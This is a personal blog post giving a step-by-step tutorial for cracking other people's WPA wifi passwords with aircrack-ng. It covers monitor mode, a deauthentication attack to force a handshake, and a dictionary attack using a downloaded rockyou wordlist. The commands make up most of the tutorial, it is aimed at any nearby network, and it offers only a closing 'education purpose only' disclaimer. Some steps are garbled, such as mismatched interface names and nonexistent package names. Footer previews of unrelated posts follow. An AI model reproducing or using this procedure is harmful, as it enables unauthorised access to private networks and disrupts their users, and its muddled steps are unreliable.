Skip to main content

how to get the wifi password in linux

this a easy one . So iam not gonna describe  the whole thing jsut follow the steps thats all.
Lets gets to it :)


first you need some free tools . if you are using a kali linux distro you already have it in case you dont follow this commands one by one



  • sudo apt-get install airmon-ng 
  • sudo apt-get install airodump-ng
  • sudo apt-get install aireplay-ng
  • sudo apt-get install aircrack-ng 
downlod this wordlist


http://scrapmaker.com/download/data/wordlists/dictionaries/rockyou.txt


and after this these we pretty much get everything we need


next step type in

ifconfig


it will show the available device pick one in mind it will looks like wlan1 wlan0 something like that 


and iam gonna pick wlan0

next type in
airmon-ng wlan0 start 
thats will start our wlan0 as monitor mode
and show some process kill them all with
kill pid

then type in
airodump-ng wlan0mon
 this will show all the available network pick the network and copy the essid,channel and bssid to a clipboard you will need it

now open a new tab type in(fill in bssid essid and channel your self from the clipboard)
 airodump-ng -c channel -w /root/essid --bssid bssid wlan1mon
 open a new tab type in (fill in the bssid)
aireplay-ng -0 -0 -a bssid wlan1mon
 wait for a sometime and then you will notice wpa handshake in our airodump tab.

to the last step 
copy both the .cap file from this /root/essid place anf the rockyou.txt to a common folder
open a new tab and ove to the common folder useing the cd command
then type in
aircrack-ng -w rockyou.txt *.cap

this will take some time .



for not the rockyou.txt have a large collection for words and aircrack compare it with the .cap file and eventually find a match


and for my defense this blog is for education purpose only and you guys should have fun while staying inside the law   

 

Comments

Popular posts from this blog

Data Type vs Return Type

Legend Of The Returned One Aha that is a question right ? Aren't they are the same thing ? At some point I honestly thought the same but actually it's not data type is not return type and return type is not data type . E ven if you are using Java php c++ or any other languages During a program we have to initialize or declare some variable for that we need to specify what data are we gonna use on that particular variable location . Then what is return type ? We seen that when we a create  or providing the definition to a function we have to specify a return type to indicate what data type is return from the function to the main function to be more specific it's know as return data type. For example void cat ( ) " the function cat is not returning any data " or int cat( ) " means cat is returning some value to the main function" Ever seen any variable as a data type of return? I haven't and please let me know...

VPN

What Is VPN ? How Dose It Work? What It Does For You ? VPN/ Virtual private Network are used to day for many reasons but we can throw all of those to a general bin .That is securely connecting an individual user to a larger network .in the older days VPN are used by cooperate employees to access their office by remote when they needed to access sensitive informations in a secured way .But in time vpn technology is available to regular internet users it helps people from all around the world to connect in  a secured way .VPN allows your connection to be encrypted and secure to become a anonymous surfing user in the web and also keep you traffic data safe from hackers mean government or may be your over concerned significant others . VPN also get you to access blocked things because of geo location some on-line things such as videos ,music file,news,search engines and so on are unavailable in some country/or places by using VPN make the user looks like a lock ...

All the way to deep net from surface web !!

SURFACE WEB DEEP WEB & DARK NET Do you ever wonder sitting in front of Google and thinking i almost know everything about anything of course if you know what you wanna know about wujajaja/jajaja(this is how people laugh in espanol) why did i laugh because i have to break it up to you  .                          The waste majority of thing in the internet is just a mask to hide the real thing out there . so what is this deep net by definition its quit simple "Those are the stuff of the internet you cant bring up with Google or bing and may be even duckduckgo" So "this are the places out there on internet you can't get in with out the actual URL(universe resource locator) and the permission to get in" Just think for a moment how many facebook pages ,how may company's with sensitive data  or some creepy privet youtube videos the other things that god know what to do with those and which is ...